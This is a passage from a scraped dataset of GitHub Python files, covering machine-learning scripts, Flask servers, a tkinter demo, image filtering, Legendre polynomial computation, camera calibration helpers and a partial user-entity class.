r[\"link\"] = input(\"new link\")\n r[\"pages\"] = input(\"new pages\")\n r[\"title\"] = input(\"new title\")\n r[\"year\"] = input(\"new year\")\n new_list.append(r)\n else:\n new_list.append(r)\n\n with open(\"BookDatabase.json\", mode='w', newline='') as read_file:\n json.dump(new_list, read_file, indent=4)\n","repo_name":"0996736Ilias/schoolopdracht","sub_path":"public-library-system-master/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19977022654","text":"import time\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Input\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.imagenet_utils import preprocess_input\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import ShuffleSplit, GridSearchCV\nfrom sklearn import metrics\n\nfrom keras import backend as K\nK.set_image_dim_ordering('tf')\n\n# Loading data\nX = pd.read_pickle('data/images.pkl')\ny = pd.read_pickle('data/info.pkl')\ny = y['followers_count']\n\"\"\"\ny2 = pd.read_pickle('data/gender2_complete.pkl')\nX2 = y2['image']\ny2 = y2['followers_count']\n\ny3 = pd.read_pickle('data/gender_complete.pkl')\nX3 = y3['image']\ny3 = y3['followers_count']\n\ny4 = pd.read_pickle('data/volkova_complete.pkl')\nX4 = y4['image']\ny4 = y4['followers_count']\n\nX = pd.concat([X, X2, X3, X4])\ny = pd.concat([y, y2, y3, y4])\n\"\"\"\nprint('shape y: ', y.shape)\nprint('shape X: ', X.shape)\nX = X.as_matrix()\nX = np.stack([array for array in X])\nX = preprocess_input(X.astype('float16'))\nprint('shape X: ', X.shape)\n\n# load VGG16\nbase_model = VGG16(weights='imagenet', include_top=True, input_tensor=Input(shape=(224,224,3)))\nprint('vgg16 model loaded')\n\ndatagen = ImageDataGenerator(\n rotation_range=60,\n zoom_range=0.2,\n horizontal_flip=True,\n )\n\nbatch_size = 32\n\npredict_generator = datagen.flow(X, batch_size=batch_size, shuffle=False)\n\n# Go over the images twice in this generator\nX_features = base_model.predict(X)\n#X_features = base_model.predict_generator(predict_generator, steps=len(X)// (batch_size/2) +2, 
verbose=1)\nprint('vgg features done')\nprint('shape X: ', X_features.shape)\n\n#X_shape = X_features.shape[0]\n#X_features = X_features.reshape(X_shape, 25088)\n#print('shape X_features:', X_features.shape)\n#print('predict X_features done')\n\n# Preprocessing age & gender\ngender = pd.get_dummies(y['gender']).as_matrix()\nprint('shape dummies:', gender.shape)\nX_features = np.hstack((X_features, gender))\nprint('shape after adding gender:', X.shape)\n\nage = pd.to_numeric(y['age'], errors='coerce')\nage.fillna(age.mean(), inplace=True)\nage_bins = [0, 13, 20, 37, 66, 100]\nage = pd.cut(age, age_bins, labels=False)\nprint(age[:5])\nprint('dummies age:', np.bincount(age))\nage = pd.get_dummies(age).as_matrix()\n\nX_features = np.hstack((X_features, age))\nprint('shape after adding age:', X.shape)\nprint('shape y:', y.shape)\n\nquantiles = [x/100 for x in range(0, 101, 5)]\nnum_classes = len(quantiles)-1\nbins = y.quantile(q=quantiles)\nbins = list(bins)\nbins[0] -= 1 #otherwise it will not pick up the lowest number\ny = pd.cut(y, bins, labels=False)\nprint('shape y: ' , y.shape)\nprint('bins:', bins)\nprint('bincount:', np.bincount(y))\n\n# Test 80%, val 15%, test 5%\nX_train, X_val, y_train, y_val = train_test_split(X_features, y, test_size=0.2, random_state=1)\nX_val, X_test, y_val, y_test = train_test_split(X_val, y_val, test_size=0.25, random_state=1)\n\nprint('shape X_train:', X_train.shape)\nprint('shape y_train:', y_train.shape)\nprint('shape X_val:', X_val.shape)\nprint('shape y_val:', y_val.shape)\nprint('bincount y_val:', np.bincount(y_val))\nprint('shape X_test:', X_test.shape)\nprint('shape y_test:', y_test.shape)\nprint('bincount y_test:', np.bincount(y_test))\nprint(y_val[:5])\n\nparameters = {\n# 'kernel': ('linear', 'sigmoid', 'poly'),\n# 'decision_function_shape': ('ovr', 'ovo'),\n# 'degree': (1, 3, 5, 10),\n# 'C': (0.5, 1, 1.5, 2),\n }\n\ngs = GridSearchCV(\n SVC(decision_function_shape='ovr', kernel='linear', C=1.5, class_weight='balanced'),\n parameters, n_jobs=-1, verbose=1,\n # seed matches others. 
Validation set is bigger\n cv=ShuffleSplit(test_size=0.20, n_splits=1, random_state=1))\n\nstart = time.time()\nprint('fitting....')\ngs = gs.fit(X_train, y_train)\nend = time.time()\nprint('training time', end - start)\n\nprint(\"Best score:\", gs.best_score_)\nprint()\nfor parameter in sorted(parameters.keys()):\n print(\"%s: %r\" % (parameter, gs.best_params_[parameter]))\n\n# Predict & evaluate\ny_pred_val = gs.predict(X_val)\nstart = time.time()\ny_pred_test = gs.predict(X_test)\nend = time.time()\n\nfs = open('info.txt', 'w')\nfs.write('Acc val: ' + str(metrics.accuracy_score(y_val, y_pred_val)) + '\\n')\nfs.write('MAE val: ' + str(metrics.mean_absolute_error(y_val, y_pred_val)) + '\\n')\nfs.write('CF val: ' + str(metrics.confusion_matrix(y_val, y_pred_val)) + '\\n')\nfs.write('Acc test: ' + str(metrics.accuracy_score(y_test, y_pred_test)) + '\\n')\nfs.write('MAE test: ' + str(metrics.mean_absolute_error(y_test, y_pred_test)) + '\\n')\nfs.write('CF test: ' + str(metrics.confusion_matrix(y_test, y_pred_test)) + '\\n')\nfs.close()\n","repo_name":"ThomasRthesis/thesis-final","sub_path":"VGG-P-SVM.py","file_name":"VGG-P-SVM.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11370413436","text":"from tkinter import *\n\nraiz = Tk()\n\nraiz.title(\"Ventana de Prueba\")\n\nraiz.resizable(True, True)\n\nraiz.iconbitmap(\"tecno.ico\")\n\nraiz.geometry(\"500x500\")\n\nraiz.config(bg=\"black\")\n\nraiz.mainloop() #esta instruccion debe estar siempre al final\n","repo_name":"leomardsr/Programas","sub_path":"python/1. tutoriales/graficos/GUI_1.pyw","file_name":"GUI_1.pyw","file_ext":"pyw","file_size_in_byte":240,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26308394957","text":"from __future__ import print_function\n\nfrom flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nfrom utility import *\nfrom conf import *\nfrom video_parser import HighlightMaker\nfrom bing_search import *\n\n\nimport os\n\n# base_url = 'http://52.53.158.244/video/'\n# base_url_original = 'http://52.53.158.244/video/original/'\n# ROOT_FOLDER = '/var/www/html/caltech-ms-server/'\n# VIDEOS_FOLDER = '/var/www/html/caltech-ms-server/videos/'\n# EDITED_VIDEOS_FOLDER = '/var/www/html/caltech-ms-server/edited_videos/'\n\nbase_url = 'http://127.0.0.1:5000/video/'\nbase_url_original = 'http://127.0.0.1:5000/video/original/'\nROOT_FOLDER = './'\nVIDEOS_FOLDER = './videos/'\nEDITED_VIDEOS_FOLDER = './edited_videos/'\n\napp = Flask(__name__)\nCORS(app)\n\napp.config['VIDEOS_FOLDER'] = VIDEOS_FOLDER\napp.config['EDITED_VIDEOS_FOLDER'] = EDITED_VIDEOS_FOLDER\n\n\n@app.route('/')\ndef home():\n return 'Caltech Hackathon'\n\n\ndef process_video(filename):\n hm = HighlightMaker()\n hm.extractHighlight(filename)\n\n\ndef speech_process(filename):\n annotations = scrape_important(filename)\n\n results = []\n for item in annotations:\n results.append({\n 'begin': item[0],\n 'topic': item[1],\n 'link': item[2]\n })\n\n return jsonify(results=results, url=base_url_original+filename)\n\n\n\n@app.route('/video/upload', methods=['POST'])\ndef video_upload():\n if request.method == 'POST':\n # check if the post request has the file part\n if Categories.ENTERTAINMENT not in request.files and Categories.SPEECH not in request.files and Categories.CLASSROOM not in request.files:\n return jsonify(\n 
error=\"No file part\"\n )\n elif Categories.ENTERTAINMENT in request.files:\n category = Categories.ENTERTAINMENT\n elif Categories.SPEECH in request.files:\n category = Categories.SPEECH\n elif Categories.CLASSROOM in request.files:\n category = Categories.CLASSROOM\n\n f = request.files[category]\n\n # if user does not select file, browser also\n # submit a empty part without filename\n if f.filename == '':\n return jsonify(\n error=\"No selected file\"\n )\n\n if f and allowed_file(f.filename):\n filename = secure_filename(f.filename)\n\n path = os.path.join(app.config['VIDEOS_FOLDER'], filename)\n f.save(path)\n\n if category == Categories.ENTERTAINMENT or category == Categories.SPEECH:\n process_video(filename)\n return jsonify(\n url=base_url+filename\n )\n elif category == Categories.CLASSROOM:\n return speech_process(filename)\n\n\n return jsonify(\n error=\"Could not upload file\"\n )\n\n\n\n@app.route('/video/', methods=['GET'])\ndef retrieve_video(filename):\n dir = app.config['EDITED_VIDEOS_FOLDER']\n return send_from_directory(dir, filename)\n\n\n@app.route('/video/original/', methods=['GET'])\ndef retrieve_original_video(filename):\n dir = app.config['VIDEOS_FOLDER']\n return send_from_directory(dir, filename)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"hnguyen0428/caltech-ms-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40630987957","text":"import json\nimport sys\n\nfrom flask import Flask, request, Response,jsonify\nfrom cortex_client import OutputMessage\n\n\n\nimport pandas as pd\nimport os\nimport turicreate\n\n\n\n\n\nratings = pd.read_csv('data.csv', sep=',', header=0)\nratings['user']= ratings['user_name'].astype('category').cat.codes\n\ndef getUserId(name):\n df = ratings[ratings['user_name']==name]['user'].max()\n if(df>=0):\n return df\n else :\n return -1\n\n\ntrain_data = turicreate.SFrame(ratings)\n#Training the model\nitem_sim_model = turicreate.item_similarity_recommender.create(train_data, user_id='user', item_id='item', target='rating', similarity_type='cosine')\n\napp = Flask(__name__)\n\n@app.route('/ping', methods=['GET'])\ndef health():\n return Response(status=200,\n response=json.dumps({'message': 'success'}),\n mimetype='application/json')\n\n\n@app.route('/invoke', methods=['POST'])\ndef invokeJob():\n params = json.loads(request.data)\n req = params.get('payload').get('test_data')\n token = params.get('token')\n user= req.get('user')\n try:\n #Making recommendations\n userid = int(getUserId(user))\n #app.logger.error(\"userid \"+userid)\n item_sim_recomm = item_sim_model.recommend(users=[userid],k=5)\n resp = {\"items\":list(item_sim_recomm['item'])}\n return Response(status=200,\n response=json.dumps(OutputMessage.create().with_payload(\n resp).to_params()),\n mimetype='application/json')\n except Exception:\n ex = sys.exc_info()\n return Response(status=500,\n response=json.dumps(OutputMessage.create().with_payload(\n str(ex)).to_params()),\n mimetype='application/json')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=6000, threaded=True)\n","repo_name":"dipali-vasani/thepiratebay-ml","sub_path":"skills/recommend/src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72444200489","text":"from CobraMetabolicModel 
import CobraMetabolicModel\nfrom MetabolicModel import MetabolicModel\nfrom Spreadsheet import Spreadsheet\n\n\n\nMODEL = \"/home/alex/PycharmProjects/tfg/models/test_models/aureus.xml\"\n\ndef main():\n # Init model\n cobra_model = MetabolicModel(CobraMetabolicModel(MODEL))\n cobra_model.spreadsheet_init()\n\n # Shows info\n cobra_model.print_model_info()\n cobra_model.spreadsheet_write_model_info(\"Model\")\n cobra_model.spreadsheet_write_reactions(\"Reactions\", ordered=True)\n cobra_model.spreadsheet_write_metabolites(\"Metabolites\", ordered=True)\n\n ####### TAREA 1.1 #######\n # Find dead end metabolites of the net\n print(\"Searching Dead End Metabolites\")\n cobra_model.find_dem()\n\n # Save dem found\n cobra_model.spreadsheet_write_dem(\"1.1 DEM\", ordered=True)\n\n ####### TAREA 2.1 #######\n # Find chokepoint reactions\n print(\"Searching Chokepoint reactions\")\n cobra_model.find_chokepoints()\n\n # Save chokepoint reactions\n cobra_model.spreadsheet_write_chokepoints(\"2.1 Chokepoint\", ordered=True)\n\n ####### TAREA 1.2 #######\n # Delete dem and clean net\n print(\"Removing Dead End Metabolites\")\n cobra_model.remove_dem()\n\n # Save new net info\n cobra_model.spreadsheet_write_model_info(\"1.2 Model\")\n\n ####### TAREA 2.2 #######\n # Find chokepoints on the new net\n print(\"Searching Chokepoint reactions on the new network\")\n cobra_model.find_chokepoints()\n\n # Save chokepoints found\n cobra_model.spreadsheet_write_chokepoints(\"2.2 Chokepoint\", ordered=True)\n\n ####### TAREA 3 #######\n # Load original model\n print(\"Running Flux Variability Analysis and updating the bounds\")\n cobra_model.read_model(MODEL)\n\n # Change reaction bounds with the ones obtained with F.V.A.\n cobra_model.fva(update_flux=True)\n\n # Save F.V.A. 
result\n cobra_model.spreadsheet_write_fva(\"3 FVA\", ordered=True)\n cobra_model.spreadsheet_write_reactions(\"3 Reactions\", ordered=True)\n\n print(\"Searching Dead End Metabolites\")\n cobra_model.find_dem()\n\n # Save DEM\n cobra_model.spreadsheet_write_dem(\"3 DEM\", ordered=True)\n\n print(\"Searching Chokepoints\")\n cobra_model.find_chokepoints()\n\n # Save chokepoints\n cobra_model.spreadsheet_write_chokepoints(\"3 Chokepoint\", ordered=True)\n\n ####### TAREA 4 #######\n print(\"Searching essential genes reactions\")\n cobra_model.find_essential_genes_reactions()\n\n # Save essential genes\n cobra_model.spreadsheet_write_essential_genes(\"4 Essential genes\")\n\n # Save chokeponint and essential genes reactions\n cobra_model.spreadsheet_write_reactions(\"4 Reactions\", ordered=True, tag_chokepoints=True, tag_essential_genes=True)\n\n path = \"main.xls\"\n print(\"Saving results to file: \", path)\n cobra_model.spreadsheet_save_file(path)\n\ndef test():\n cobra_model = MetabolicModel(CobraMetabolicModel(MODEL))\n cobra_model.print_dem()\n cobra_model.print_chokepoints()\n cobra_model.print_model_info()\n cobra_model.print_metabolites()\n cobra_model.print_reactions()\n cobra_model.print_genes()\n cobra_model.print_essential_genes()\n cobra_model.print_essential_genes_reactions()\n cobra_model.print_essential_reactions()\n\n\ntest()\n","repo_name":"alexOarga/findCritical","sub_path":"main/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41026560593","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 18 00:02:21 2019\n\n@author: kanthonye\n\"\"\"\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n \nimg = cv2.imread('q2-eql_hist-overexposed.jpg')\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblr = cv2.GaussianBlur(img, (3,3), -10) # remove noise\n\ncv2.imwrite('q4-spatial_filtering.jpg', blr)\n\n#lap = cv2.Laplacian(blr, cv2.CV_64F) # convolute \n\nsob = cv2.Sobel(blr, cv2.CV_64F, 1, 1, ksize=3)\ncv2.imwrite('q4-first_order_derivative.jpg', sob)\n\nsob = cv2.Sobel(sob, cv2.CV_64F, 1, 1, ksize=3)\ncv2.imwrite('q4-second_order_derivative.jpg', sob)\n\nsob = cv2.convertScaleAbs(sob)\nsrp = cv2.addWeighted(sob, 1.5, sob, -0.75, 0) # unshapen \n\ncv2.imwrite('q4-unshapen.jpg', srp)","repo_name":"kanthonye/school-projects","sub_path":"qc/image-processing/proj2/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18913243330","text":"#!/usr/bin/env python\nu\"\"\"\nplm_mohlenkamp.py\nWritten by Tyler Sutterley (05/2021)\n\nComputes fully-normalized associated Legendre Polynomials\n for an array of x values\nUses Martin Mohlenkamp's recursion relation derived from the\n Szego (1939) Recurrence formula for Jacobi Polynomials (Pg 71)\n\nWith this algorithm, the associated Legendre Functions are\n constructed as an amplitude times a Jacobi Polynomial\n P[l,m](cos(theta)) = (sin(theta)^2)*J[l-m,m,m](cos(theta))\n\nCALLING SEQUENCE:\n plm = plm_mohlenkamp(LMAX, np.cos(theta))\n\nINPUTS:\n LMAX: Upper bound of Spherical Harmonic Degrees\n x: elements ranging from -1 to 1\n typically cos(theta), where theta is the colatitude in radians\n\nOUTPUT:\n plm: Legendre polynomials (geodesy normalization)\n\nOPTIONS:\n MMAX: Upper bound of Spherical Harmonic Orders (default = LMAX)\n\nPYTHON 
DEPENDENCIES:\n numpy: Scientific Computing Tools For Python (https://numpy.org)\n\nNOTES:\n Modified and updated from IDL plm_x.pro coded by Sean Swenson\n Difference from martin function in geoid_mk.mac.f:\n plms from plm_mohlenkamp are normalized inside the function\n plms from martin are normalized outside the function\n For large spherical harmonic degrees this recurrence relation\n is poorly conditioned\n For spherical harmonic orders above ~1000 can cause overflows\n\nREFERENCES:\n Martin Mohlenkamp, \"A User's Guide to Spherical Harmonics\"\n http://www.ohiouniversityfaculty.com/mohlenka/research/uguide.pdf\n\nUPDATE HISTORY:\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 09/2020: verify dimensions of input x variable\n Updated 07/2020: added function docstrings\n Updated 05/2015: added parameter MMAX for MMAX != LMAX\n Written 09/2013\n\"\"\"\nimport numpy as np\n\ndef plm_mohlenkamp(LMAX, x, MMAX=None):\n \"\"\"\n Computes fully-normalized associated Legendre Polynomials\n using Martin Mohlenkamp's recursion relation\n\n Arguments\n ---------\n LMAX: Upper bound of Spherical Harmonic Degrees\n x: elements ranging from -1 to 1\n\n Keyword arguments\n -----------------\n MMAX: Upper bound of Spherical Harmonic Orders\n\n Returns\n -------\n plms: fully-normalized Legendre polynomials\n \"\"\"\n\n #-- Verify LMAX as integer\n LMAX = np.int64(LMAX)\n #-- upper bound of spherical harmonic orders (default = LMAX)\n if MMAX is None:\n MMAX = np.copy(LMAX)\n\n #-- removing singleton dimensions of x\n x = np.atleast_1d(x).flatten()\n #-- length of the x array\n sx = len(x)\n\n #-- Initialize the output Legendre polynomials\n plm=np.zeros((LMAX+1,MMAX+1,sx))\n #-- Jacobi polynomial for the recurrence relation\n jlmm=np.zeros((LMAX+1,MMAX+1,sx))\n #-- for x=cos(th): rsin= sin(th)\n rsin=np.sqrt(1.0 - x**2)\n\n #-- for all spherical harmonic orders of interest\n for mm in range(0,MMAX+1):#-- equivalent to 0:MMAX\n #-- Initialize the recurrence relation\n #-- J-1,m,m Term == 0\n #-- J0,m,m Term\n if (mm > 0):\n #-- j ranges from 1 to mm for the product\n j = np.arange(0,mm)+1.0\n jlmm[0,mm,:] = np.prod(np.sqrt(1.0 + 1.0/(2.0*j)))/np.sqrt(2.0)\n else: #-- if mm == 0: jlmm = 1/sqrt(2)\n jlmm[0,mm,:] = 1.0/np.sqrt(2.0)\n #-- Jk,m,m Terms\n for k in range(1, LMAX+1):#-- computation for SH degrees\n #-- Initialization begins at -1\n #-- this is to make the formula parallel the function written in\n #-- Martin Mohlenkamp's Guide to Spherical Harmonics\n #-- Jacobi General Terms\n if (k == 1):#-- for degree 1 terms\n jlmm[k,mm,:] = 2.0*x * jlmm[k-1,mm,:] * \\\n np.sqrt(1.0 + (mm - 0.5)/k) * \\\n np.sqrt(1.0 - (mm - 0.5)/(k + 2.0*mm))\n else:#-- for all other spherical harmonic degrees\n jlmm[k,mm,:] = 2.0*x * jlmm[k-1,mm,:] * \\\n np.sqrt(1.0 + (mm - 0.5)/k) * \\\n np.sqrt(1.0 - (mm - 0.5)/(k + 2.0*mm)) - \\\n jlmm[k-2,mm,:] * np.sqrt(1.0 + 4.0/(2.0*k + 2.0*mm - 3.0)) * \\\n np.sqrt(1.0 - (1.0/k)) * np.sqrt(1.0 - 1.0/(k + 2.0*mm))\n #-- Normalization is geodesy convention\n for l in range(mm,LMAX+1): #-- equivalent to mm:LMAX\n if (mm == 0):#-- Geodesy normalization (m=0) == sqrt(2)*sin(th)^0\n #-- rsin^mm term is dropped as rsin^0 = 1\n plm[l,mm,:] = np.sqrt(2.0)*jlmm[l-mm,mm,:]\n else:#-- Geodesy normalization all others == 2*sin(th)^mm\n plm[l,mm,:] = 2.0*(rsin**mm)*jlmm[l-mm,mm,:]\n return 
plm\n","repo_name":"geodeepak/GRACE_HYDL","sub_path":"gravity_toolkit/plm_mohlenkamp.py","file_name":"plm_mohlenkamp.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"679282772","text":"import tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error, classification_report\n\n\n# class that able to create a data and generate batches to send it back\n\nclass TimeSeriesData () :\n def __init__(self, num_points, xmin, xmax) :\n self.xmin = xmin\n self.xmax = xmax\n self.num_points = num_points\n self.resolution = (xmax-xmin) / num_points\n self.x_data = np.linspace(xmin, xmax, num_points)\n self.y_true = np.sin(self.x_data)\n\n # comparing data that we don't have\n def ret_true(self, x_series) :\n return(np.sin(x_series))\n\n # genarate batches of data\n def next_batch(self, batch_size, steps, return_batch_ts = False):\n # grab a random starting point for each batch\n rand_start = np.random.rand(batch_size,1)\n\n # convert to be on time series\n ts_start = rand_start * (self.xmax - self.xmin - (steps*self.resolution))\n \n # create batch time series on the x axis\n batch_ts = ts_start + np.arange(0.0, steps+1) * self.resolution\n \n # create y data for the time series x axis from previous steps\n y_batch = np.sin(batch_ts)\n\n # formatting for RNN\n if return_batch_ts :\n return y_batch[:,:-1].reshape(-1,steps,1) , y_batch[:,1:].reshape(-1,steps,1), batch_ts\n else :\n return y_batch[:,:-1].reshape(-1,steps,1) , y_batch[:,1:].reshape(-1,steps,1)\n \n\nts_data = TimeSeriesData(250,0,10) # 250 points between 0 and 10\n\nnum_time_steps = 30\n\ny1, y2, ts = ts_data.next_batch(1,num_time_steps, True)\n\n# plt.plot(ts.flatten()[1:], y2.flatten(), '*', label='single traing instance') #flatten means take everythinf in one list\n# plt.plot(ts_data.x_data, ts_data.y_true, label='sin(t)')\n# plt.legend()\n# plt.tight_layout() \n\n# plt.show()\n\n# trainin Data\ntrain_inst = np.linspace(5,5+ts_data.resolution*(num_time_steps+1), num_time_steps+1)\n\n#plt.title('A Training Instance')\n#plt.plot(train_inst[:-1],ts_data.ret_true(train_inst[:-1]), 'bo', markersize=15, alpha=0.5,label='INSTANCE')\n# predict one time step\n#plt.plot(train_inst[1:],ts_data.ret_true(train_inst[1:]), 'ko', markersize=5, alpha=0.5,label='Target')\n#plt.show()\n\n################ create the model ####################\n\ntf.reset_default_graph()\nnum_input = 1 # basically one feature in ts\nnum_neurons = 100 # 100 neurons in one layer\nnum_outputs = 1\nlearning_rate = 0.01\nnum_train_iterations = 2000\nbatch_size = 1\n\n# palceholders\nx = tf.placeholder(tf.float32,[None, num_time_steps,num_input])\ny = tf.placeholder(tf.float32,[None, num_time_steps,num_outputs])\n\n# RNN cell layer\n#BasicLSTMCell, GRUCell, MultiRNNCell\ncell = tf.contrib.rnn.GRUCell(num_units=num_neurons, activation=tf.nn.relu)\ncell = tf.contrib.rnn.OutputProjectionWrapper(cell, output_size= num_outputs)\n\n# get output and states of these basic RNN cells\noutputs, states = tf.nn.dynamic_rnn(cell=cell,inputs= x, dtype=tf.float32)\n\n#lost function and optimizer\n# MSE as loss function\nloss = tf.reduce_mean(tf.square(outputs-y))\n\n#optimizer\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain = optimizer.minimize(loss)\n\n#Session\nsaver = tf.train.Saver() 
# save the model\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n\n for iteration in range(num_train_iterations) :\n x_batch, y_batch = ts_data.next_batch(batch_size,num_time_steps)\n sess.run(train, feed_dict={x: x_batch, y:y_batch})\n\n if iteration % 100 == 0 :\n mse = loss.eval(feed_dict={x: x_batch, y:y_batch})\n print(iteration, \"\\tMSE\", mse)\n \n saver.save(sess,\"./rnn_time_series_model_codealong\")\n\n\nwith tf.Session() as sess :\n saver.restore(sess, \"./rnn_time_series_model_codealong\")\n\n x_new = np.sin(np.array(train_inst[:-1].reshape(-1,num_time_steps,num_input)))\n y_pred = sess.run(outputs, feed_dict={x:x_new})\n\n#graph\n#traing instance\nplt.plot(train_inst[:-1],np.sin(train_inst[:-1]), \"bo\", markersize=15,alpha=0.5,label='trainig_instance')\n\n#target to predect (correct test valus np.sin(train))\nplt.plot(train_inst[1:], np.sin(train_inst[1:]),\"ko\", markersize=10,label=\"target\")\n\n#model predection\nplt.plot(train_inst[1:], y_pred[0,:,0],'r.', markersize=10, label='predection')\nplt.xlabel('TIME')\nplt.legend()\nplt.tight_layout()\n\nplt.show()\n\n\n\n","repo_name":"Rasika666/ml","sub_path":"tensorflow/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742742887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef calculate_intrinsics_1d(x3, z3, x2):\n \"\"\"\n Calculate f and c values such that f3/x3 * f + c = x2.\n\n Args:\n x3: array length n, representing '3d' x coordinate.\n z3: array length n, representing '3d' z coordinate.\n x2: array length n, representing '2d' x coordinate.\n\n Returns:\n f: focal length in 1d\n c: pixel offset in 1d\n \"\"\"\n n = x3.shape[0]\n assert(x3.shape == (n,))\n assert(x3.shape == z3.shape == (n,))\n assert(x2.shape == (n,))\n A = np.ones((n, 2))\n A[:, 0] = x3 / z3\n sol, res, rank, s = np.linalg.lstsq(A, x2)\n\n assert(sol.shape == (2,))\n f, c = sol\n return f, c\n\n\ndef calculate_intrinsics_2d(p3, p2, dtype=np.float32):\n \"\"\"\n Calculate f and c values such that transforms.project(p3, f, c) = p2.\n\n i.e.\n p3[:, :2] / p3[:, 2:] * f + c = p2\n\n Args:\n p3: 3d coordinates, shape (n, 3)\n p2: 2d coordintaes, shape (n, 2)\n Returns:\n f: np array with 2 entries, focal lengths\n c: np array with 2 entries, pixel offset\n \"\"\"\n n = p3.shape[0]\n assert(p3.shape == (n, 3))\n assert(p2.shape == (n, 2))\n fcs = [calculate_intrinsics_1d(\n p3[:, i], p3[:, 2], p2[:, i]) for i in range(2)]\n f = np.array([fc[0] for fc in fcs], dtype=dtype)\n c = np.array([fc[1] for fc in fcs], dtype=dtype)\n return f, c\n\n\ncalculate_intrinsics = calculate_intrinsics_2d\n\n\ndef calculate_extrinsics(A, B, overwrite=False):\n \"\"\"\n Calculate rotation, translation and scale such that k*A*R.T + t = B.\n\n Args:\n A: matrix, shape (n, m)\n B: matrix, shape (n, m)\n overwrite: if true, values of A and B are overwritten\n\n Returns:\n R: matrix, shape (m, m). Orthogonal, i.e. 
dot(R, R.T) = 0\n t: vector, shape (n,)\n k: scalar\n such that k*np.dot(A, R.T) + t = B\n\n Base on scipy.spatial.procruste.\n \"\"\"\n from scipy.linalg import orthogonal_procrustes\n if not overwrite:\n A = A.copy()\n B = B.copy()\n ta = np.mean(A, axis=0)\n tb = np.mean(B, axis=0)\n A -= ta\n B -= tb\n ka = np.linalg.norm(A)\n kb = np.linalg.norm(B)\n if ka == 0 or kb == 0:\n raise ValueError(\"Input matrices must contain >1 unique points\")\n A /= ka\n B /= kb\n R, S = orthogonal_procrustes(A, B)\n k = kb / ka\n t = tb - k*np.dot(ta, R)\n R = R.T\n return R, t, k\n\n\nif __name__ == '__main__':\n from np_impl import project\n n = 100\n p3 = np.abs(np.random.random((n, 3)))\n p3[:, 2] += 10\n f = np.array([105, 101])\n c = np.array([1000, 2000])\n\n p2 = project(p3, f, c)\n\n fi, ci = calculate_intrinsics(p3, p2)\n print(fi - f)\n print(ci - c)\n","repo_name":"jackd/human_pose_util","sub_path":"human_pose_util/transforms/camera_params.py","file_name":"camera_params.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"44006690437","text":"from typing import Tuple\nfrom ..errors.entity_errors import ParamNotValidated\nfrom ..enums.item_type_enum import ItemTypeEnum\n\nclass User:\n name: str\n agency: str\n account: str\n current_balance: float\n\n def __init__(self, name: str = None, agency: str = None, account: str = None, current_balance: float = None):\n validation_name = self.validate_name(name)\n if validation_name[0] is False:\n raise ParamNotValidated(\"name\", validation_name[1])\n self.name = name\n\n validation_agency = self.validate_agency(agency)\n if validation_agency[0] is False:\n raise ParamNotValidated(\"agency\", validation_agency[1])\n self.agency = agency\n\n validation_account = self.validate_account(account)\n if validation_account[0] is False:\n raise ParamNotValidated(\"account\", validation_account[1])\n self.account = account\n\n validation_current_balance = self.validate_current_balance(current_balance)\n if validation_current_balance[0] is False:\n raise ParamNotValidated(\"current balance\", validation_current_balance[1])\n self.current_balance = current_balance\n \n @staticmethod\n def validate_name(name: str) -> Tuple[bool, str]:\n if name is None:\n return (False, \"Name is required\")\n if type(name) != str:\n return (False, \"Name must be a str\")\n if len(name) < 3:\n return (False, \"Name must be at least 3 characters long\")\n return (True, \"\")\n \n @staticmethod\n def validate_agency(agency: str) -> Tuple[bool, str]:\n if str is None:\n return (False, \"Agency is required\")\n if type(agency) != str:\n return (False, \"Agency must be a str\")\n if len(agency) != 4:\n return (False, \"Agency must be a four digit number\")\n return (True, \"\")\n \n @staticmethod\n def validate_account(account: str) -> Tuple[bool, str]:\n if account is None:\n return (False, \"Account is required\")\n if 